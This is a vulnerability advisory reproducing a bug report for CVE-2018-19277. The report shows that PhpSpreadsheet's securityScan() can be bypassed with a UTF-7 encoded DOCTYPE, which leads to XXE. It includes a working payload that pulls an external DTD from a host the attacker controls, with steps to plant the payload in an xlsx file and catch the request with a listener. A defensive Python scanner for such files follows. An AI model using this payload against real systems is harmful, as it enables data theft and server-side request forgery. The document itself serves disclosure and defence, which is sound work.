FRIENDSOFPHP:PHPOFFICE:PHPSPREADSHEET:CVE-2018-19277
Nov 20, 2018 - 7:50 p.m.

XXE Vulnerability

2018-11-20 19:50:00
OpenJS Foundation
github.com

CVSS2: 6.8 Medium
Attack Vector: NETWORK
Attack Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3: 8.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

AI Score: 7 High
Confidence: Low

EPSS: 0.019 Low
Percentile: 88.5%

This is:
- [X] a bug report
- [ ] a feature request
- [ ] not a usage question (ask them on https://stackoverflow.com/questions/tagged/phpspreadsheet or https://gitter.im/PHPOffice/PhpSpreadsheet)

What is the expected behavior?
The securityScan() function is used to prevent XXE attacks.

What is the current behavior?
The securityScan() function can be bypassed by using UTF-7 encoding.

What are the steps to reproduce?
/Details suppressed until after patch was released/

Replace the IP address and port 127.0.0.1:8080 with something you control.

+ADwAIQ-DOCTYPE xmlrootname +AFsAPAAh-ENTITY +ACU aaa SYSTEM +ACI-http://127.0.0.1:8080/ext. dtd+ACIAPgAl-aaa+ADsAJQ-ccc+ADsAJQ-ddd+ADsAXQA+

sheet1.xml

Replace sheet1.xml in your xlsx file with the one above and re-zip the excel sheet. I’ve attached an xlsx file that makes a request as configured above.

File exploit-localhost.xlsx

Set up a listener either with Python, netcat, etc. locally and watch for a request that will be made once the xlsx is read by the library.

Please let me know if you would like more details on generating the xlsx file or if you need any clarification about the issue.

Which versions of PhpSpreadsheet and PHP are affected?
I believe it affects all versions.
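The bypass reported above works at the encoding layer, so a defender-side check has to decode each part with its declared encoding before looking for DTD markup. The following is an added example for triaging uploaded xlsx files, not code from the issue or from PhpSpreadsheet; `naive_scan` is a simplified stand-in for a byte-level check, and the function names, the encoding allow-list and the sample part are constructed for illustration.

```python
import io
import re
import zipfile

# Encoding pseudo-attribute of an XML declaration, as seen in ASCII-compatible bytes.
ENC_RE = re.compile(rb'<\?xml[^>]*?encoding\s*=\s*["\']([A-Za-z0-9._-]+)["\']')
DTD_RE = re.compile(r"<!\s*(DOCTYPE|ENTITY)", re.IGNORECASE)
ALLOWED = {"utf-8", "utf8", "us-ascii", "ascii"}  # assumed policy: UTF-8 family only

# Constructed sample part: "+ADwAIQ-" is UTF-7 for "<!"; the entity is internal and inert.
CONSTRUCTED_PART = (b'<?xml version="1.0" encoding="UTF-7"?>'
                    b'+ADwAIQ-DOCTYPE r [+ADwAIQ-ENTITY x "y">]><r/>')

def naive_scan(data: bytes) -> bool:
    return b"<!DOCTYPE" in data  # simplified byte-level check, blind to other encodings

def scan_part(data: bytes) -> list[str]:
    """Return findings for one XML part; an empty list means nothing was flagged."""
    findings = []
    m = ENC_RE.search(data[:200])
    declared = m.group(1).decode("ascii").lower() if m else "utf-8"
    if declared not in ALLOWED:
        findings.append(f"declared encoding {declared!r} is not UTF-8")
    try:
        text = data.decode(declared)
    except (LookupError, UnicodeDecodeError):
        findings.append("cannot decode with declared encoding")
        text = data.decode("latin-1")
    # Drop NULs so UTF-16/32 content without a usable declaration is still matched.
    if DTD_RE.search(text.replace("\x00", "")):
        findings.append("DOCTYPE/ENTITY present after decoding")
    return findings

def scan_xlsx(blob: bytes) -> dict[str, list[str]]:
    """Scan every XML-like part of an xlsx (zip) archive; map part name to findings."""
    flagged = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as archive:
        for name in archive.namelist():
            if name.endswith((".xml", ".rels", ".vml")):
                if (findings := scan_part(archive.read(name))):
                    flagged[name] = findings
    return flagged

def build_sample() -> bytes:  # constructed two-part archive, not a valid workbook
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("xl/workbook.xml", b'<?xml version="1.0" encoding="UTF-8"?><workbook/>')
        archive.writestr("xl/worksheets/sheet1.xml", CONSTRUCTED_PART)
    return buf.getvalue()
```

Calling `scan_xlsx(build_sample())` flags only `xl/worksheets/sheet1.xml`, while `naive_scan` returns `False` for the same part.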

Affected configurations

Vulners
Node: phpoffice phpspreadsheet, Range: 1.5.0
CPE Name: phpoffice/phpspreadsheet, Operator: le, Version: 1.5.0
